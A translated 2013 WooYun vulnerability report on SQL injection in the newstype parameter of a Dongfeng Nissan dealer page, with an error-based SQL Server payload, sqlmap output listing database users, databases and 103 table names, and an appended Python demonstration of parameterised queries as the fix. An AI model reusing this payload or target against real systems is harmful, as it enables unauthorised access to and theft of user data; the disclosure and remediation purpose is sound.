Vulnerability summary

Defect ID: wooyun-2013-045933

Title: Dongfeng Nissan # SQL injection on the official website (involves a large amount of user information)

Vendor: dfyb.com

Author: he2des

Submitted: 2013-12-19 17:14

Fix time: 2013-12-24 17:15

Disclosure time: 2013-12-24 17:15

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-12-19: Details sent to the vendor, awaiting vendor handling
2013-12-24: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Didn't know where to submit this, so I handed it to CNCERT (the National Internet Emergency Center).

Details:

#1: Injection point

[screenshot: QQ图片20131214151820.jpg]


http://www.dongfeng-nissan.com.cn/dealer/nissan/zhejiang/wenzhou/wzjhong/news?newstype=NewsType_004

---
Place: GET
Parameter: newstype
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: newstype=NewsType_004' AND 2738=CONVERT(INT,(CHAR(58)+CHAR(119)+CHA
R(101)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (2738=2738) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(58)+CHAR(106)+CHAR(108)+CHAR(106)+CHAR(58))) AND 'BhUX'='BhUX
---
[15:17:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:17:08] [INFO] fetching database users
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': 4
[15:17:08] [INFO] the SQL query used returns 4 entries
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyEventProcessingLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyTsqlExecutionLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': read
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': sa
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] read
[*] sa
[15:17:08] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.dongfeng-nissan.com.cn'

Proof of vulnerability:

available databases [12]:
[*] DFLBackground
[*] DFLLoginLog
[*] DFLSitecore_Core
[*] DFLSitecore_Extend
[*] DFLSitecore_Web
[*] DFLWebService
[*] master
[*] model
[*] msdb
[*] Npass
[*] SMS
[*] tempdb

[screenshot: QQ图片20131214151924.jpg]


[103 tables]
+------------------------------+
| dbo.ACTIVITY |
| dbo.ACTIVITY_SERIES |
| dbo.ACTIVITY_UPDATE_LOG |
| dbo.COMMON_PARAMETER |
| dbo.COMMON_PARAMETER_DETAIL |
| dbo.DEALER_BIND_MOBILE |
| dbo.DEALER_INFO |
| dbo.DEALER_KV |
| dbo.DEALER_MEDIA_MAPPING |
| dbo.DEALER_POINTS |
| dbo.DEALER_PRICE |
| dbo.DEALER_PRICE1212 |
| dbo.DEALER_PRICE20131202 |
| dbo.DEALER_SERIES_MAPPING |
| dbo.DEALER_VIDEO |
| dbo.FILE_UPLOAD |
| dbo.HELP_CENTER |
| dbo.MEDAL |
| dbo.MEDAL_DEALERS |
| dbo.MEDIA_DEALER_MAPPING |
| dbo.MEDIA_TAB_INFORMATION |
| dbo.MESSAGE_DEALER |
| dbo.MESSAGE_INFO |
| dbo.MESSAGE_USER |
| dbo.MODULE |
| dbo.NEWS |
| dbo.NEWS_MODEL_CONFIG |
| dbo.NEWS_SERIES |
| dbo.NEWS_UPDATE_LOG |
| dbo.OFFICAL_ISSUE_ACTIVITY |
| dbo.OFFICAL_ISSUE_ATTACH |
| dbo.OFFICAL_ISSUE_DEALER |
| dbo.OFFICAL_ISSUE_IMAGE |
| dbo.OFFICAL_ISSUE_KV |
| dbo.OFFICAL_ISSUE_NEWS |
| dbo.OFFICAL_ISSUE_PACKAGE |
| dbo.OFFICAL_ISSUE_VIDEO |
| dbo.ONLINEQA |
| dbo.ONLINEQA_TEMPLETE |
| dbo.ONLINE_ANSWER |
| dbo.OPERATER_LOG |
| dbo.REGION |
| dbo.REGION_DEALERS |
| dbo.REGION_DEALERS20131206 |
| dbo.REGION_DEALERS_TP |
| dbo.REGION_INFO |
| dbo.REGION_KV |
| dbo.REGION_PRICE |
| dbo.SECURITY_ACTION |
| dbo.SECURITY_MOUDLE |
| dbo.SECURITY_ROLE |
| dbo.SECURITY_USER |
| dbo.SECURITY_USER20131206 |
| dbo.SECURITY_USER_UPDATE_LOG |
| dbo.SITECORE_DEALER_PATH |
| dbo.USER_SHORT_CUT |
| dbo.VIDEO_DETAIL |
| dbo.WEBSITE_VISIT_ANALYSIS |
| dbo.WEB_FORM_CUS_INFO |
| dbo.WEB_FORM_INFO |
| dbo.ZAN |
| dbo.ZAN_DETAILS |
| dbo.ZAN_ITEM_MAPPING |
| dbo.dealername$ |
| dbo.newcount$ |
| dbo.newrd$ |
| dbo.newregion$ |
| dbo.news20131202 |
| dbo.news_20131203 |
| dbo.region1 |
| dbo.sysdiagrams |
| dbo.tmpNoRegion |
| dbo.tmpOneRoneD |
| dbo.tmp_region_venucia |
| dbo.view_AllDealerDflMails |
| dbo.view_AllDealerURLs |
| dbo.view_AllDealerURLsEx |
| dbo.view_AllDealers |
| dbo.view_AllModel |
| dbo.view_AllModelInfo |
| dbo.view_AllModelParameters |
| dbo.view_AllModelPrice |
| dbo.view_AllRegionNames |
| dbo.view_DealerCity |
| dbo.view_DealerCityCode |
| dbo.view_DealerCodes |
| dbo.view_DealerProvinceCode |
| dbo.view_DealerRegionName |
| dbo.view_ModelCodes |
| dbo.view_ModelConfig |
| dbo.view_NissanDealers |
| dbo.view_NotDealers |
| dbo.view_ProvinceCity |
| dbo.view_SeriesCodes |
| dbo.view_ShowAllSeries |
| dbo.view_ShowSerieCodes |
| dbo.view_VenuciaDealers |
| dbo.勋章类$ |
| dbo.启辰$ |
| dbo.城市站点$ |
| dbo.日产$ |
| dbo.通过绿色专营店认证名单$ |
| dbo.需要使用的专营店$ |
+------------------------------+


The amount of data is fairly large; I still hope your site will take security issues seriously.

Fix recommendation:

Filter~
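As an added illustration of the fix (example code written for this page, not from the report's author or from the site's code base): the site runs ASP.NET on SQL Server, but the difference between concatenating the newstype parameter into the query text and binding it as a parameter is the same in any language, so this uses Python's built-in sqlite3 as a stand-in database. The NEWS table layout, the sample rows and the NewsType_NNN format used for the allow-list are assumptions; the injected value is the one quoted in the sqlmap output above. Against the concatenated query the injected expression reaches the database and produces a database error (the channel an error-based injection reads from the response); against the parameterised query it is compared as plain data and matches nothing, and the allow-list in front of it rejects the value before it reaches the database at all.

```python
import re
import sqlite3

# Constructed sample data. The page lists a dbo.NEWS table and a newstype
# request parameter; the column layout and the rows here are assumptions.
SAMPLE_ROWS = [
    (1, "NewsType_004", "Dealer opening hours"),
    (2, "NewsType_004", "Winter service campaign"),
    (3, "NewsType_001", "New model launch"),
]

# The injected value quoted in the sqlmap output on this page (URL-decoded).
PAGE_PAYLOAD = (
    "NewsType_004' AND 2738=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(101)+CHAR(105)"
    "+CHAR(58)+(SELECT (CASE WHEN (2738=2738) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(58)+CHAR(106)+CHAR(108)+CHAR(106)+CHAR(58))) AND 'BhUX'='BhUX"
)

# Assumed allow-list for the parameter format: values such as NewsType_004.
NEWSTYPE_PATTERN = re.compile(r"NewsType_[0-9]{3}")


def open_sample_db():
    """In-memory SQLite database standing in for the site's SQL Server instance."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NEWS (id INTEGER PRIMARY KEY, newstype TEXT, title TEXT)")
    conn.executemany("INSERT INTO NEWS VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, newstype):
    """Concatenates the request parameter into the SQL text (the flaw on this page).

    A quote in the input closes the string literal and the remainder is parsed as
    SQL. The database error raised by the injected expression is what the
    error-based technique in the sqlmap output reads back from the response.
    """
    sql = "SELECT id, title FROM NEWS WHERE newstype = '" + newstype + "' ORDER BY id"
    try:
        return {"status": "ok", "rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"status": "db_error", "rows": [], "error": str(exc)}


def parameterised_lookup(conn, newstype):
    """Binds the value as a parameter: it is only ever compared as data."""
    sql = "SELECT id, title FROM NEWS WHERE newstype = ? ORDER BY id"
    return {"status": "ok", "rows": conn.execute(sql, (newstype,)).fetchall()}


def hardened_lookup(conn, newstype):
    """Allow-list validation (the 'filter' the author recommends) in front of the
    parameterised query, so malformed values are rejected before any SQL runs."""
    if NEWSTYPE_PATTERN.fullmatch(newstype) is None:
        return {"status": "rejected", "rows": []}
    return parameterised_lookup(conn, newstype)


if __name__ == "__main__":
    db = open_sample_db()
    for value in ("NewsType_004", PAGE_PAYLOAD):
        print(repr(value[:24]), "->",
              "concatenated:", vulnerable_lookup(db, value)["status"],
              "parameterised:", parameterised_lookup(db, value)["status"],
              "allow-listed:", hardened_lookup(db, value)["status"])
```

Parameterisation alone is the fix; the allow-list is defence in depth that also keeps unexpected values from producing noisy database errors, and the same pattern applies to SqlCommand parameters on the site's actual ASP.NET/SQL Server stack.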

Copyright notice: when reposting, please credit the source he2des@WooYun


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2013-12-24 17:15

Vendor reply:

Latest status:

None yet